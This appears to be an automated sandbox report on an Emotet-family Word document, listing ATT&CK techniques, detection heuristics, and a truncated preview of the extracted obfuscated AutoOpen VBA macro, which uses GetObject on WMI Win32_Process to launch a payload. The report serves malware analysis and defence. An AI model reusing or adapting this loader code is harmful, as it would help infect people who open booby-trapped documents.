MALICIOUS
282
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
T1203 Exploitation for Client Execution
The sample is a malicious Office document containing obfuscated VBA macros, specifically an AutoOpen macro that uses GetObject to execute code. ClamAV identifies this as Doc.Downloader.Emotet-6969153-0, strongly suggesting Emotet family. The VBA code is heavily obfuscated, indicating an attempt to evade detection, and its primary function is to download and execute a secondary payload.
Heuristics 8
-
ClamAV: Doc.Downloader.Emotet-6969153-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Emotet-6969153-0
-
VBA macros detected medium 4 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADERAuto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
GetObject call high OLE_VBA_GETOBJGetObject call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 7600 bytes |
SHA-256: 548b774705a3485ba39b23e8b181e4f6339f72ed941c819604f778cb8538cbdf |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "s809414"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "H47791"
Attribute VB_Base = "0{84BA4EDA-3030-441D-9B9F-85CC551D54D4}{21E9DCB8-B7C2-428C-AEF0-5618FBBCC61D}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "t546__"
Attribute VB_Name = "H0491271"
Attribute VB_Name = "j312667"
Attribute VB_Base = "0{5E3DD7C8-252B-4672-BBD8-C0ED11D7007D}{ACF3260D-7AE1-4F24-A360-A68A0916F1E9}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "I0366176"
Function k_6499(M0075388)
While t71215 And n30826
Close ("d83039")
Close ("i61336")
Close ("719628733")
Close ("445853956")
Wend
While J3491272 And W12506_
Close ("V4652784")
Close ("t3__9076")
Close ("869063569")
Close ("504508744")
Wend
While p77_316 And b1454784
Close ("S_7071")
Close ("r_4613")
Close ("550767436")
Close ("813533166")
Wend
Set k_6499 = CVar(M0075388)
While W_65181 And G56518
Close ("P374487")
Close ("u_340099")
Close ("990644500")
Close ("600345385")
Wend
While M_5_584 And s347000
Close ("z51542_5")
Close ("D88900")
Close ("424495686")
Close ("811232344")
Wend
End Function
Sub _
autoopen()
On Error Resume Next
While s573228 And Z600446
Close ("F_62880")
Close ("s08677")
Close ("975322690")
Close ("869452482")
Wend
While d8922689 And v953_5
Close ("o5750_")
Close ("K204904")
Close ("593153193")
Close ("982901103")
Wend
While h044543_ And F_335826
Close ("Y995276")
Close ("m91764")
Close ("934648098")
Close ("801472931")
Wend
Call i3180459
While u037229 And P7798912
Close ("F_46411")
Close ("q16614")
Close ("681455954")
Close ("116930874")
Wend
While f019566 And z01488
Close ("A0264__")
Close ("G345963")
Close ("308306476")
Close ("441684264")
Wend
While E496_2_ And E690575_
Close ("j038385")
Close ("w947415")
Close ("206867240")
Close ("732265525")
Wend
End Sub
Attribute VB_Name = "N41364_"
Function i3180459()
On Error Resume Next
While w610585 And X515660
Close ("l5780_57")
Close ("A87488")
Close ("671928644")
Close ("67070097")
Wend
While W493_43 And Z1_565
Close ("f9955008")
Close ("F20485")
Close ("953526756")
Close ("945698588")
Wend
B467960 = H47791.B235287.Tag + j312667.J_745482 + H47791.B235287 + j312667.Q78810 + H47791.B235287.Value + H47791.B235287 + j312667.z926_7 + H47791.B235287 + H47791.B235287.Tag + j312667.c5253727 + H47791.B235287 + j312667.d1_26907.ControlTipText + H47791.B235287
While q6800584 And R8459099
Close ("h_09_90")
Close ("S205855")
Close ("249600478")
Close ("956636474")
Wend
While W636305_ And d1360_
Close ("D3906_")
Close ("U_28868")
Close ("510091760")
Close ("55526268")
Wend
Set L01__7 = k_6499(GetObject(CStr("wi") + CStr("nmgmt") + "s:Win32_Proce" + "ss"))
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.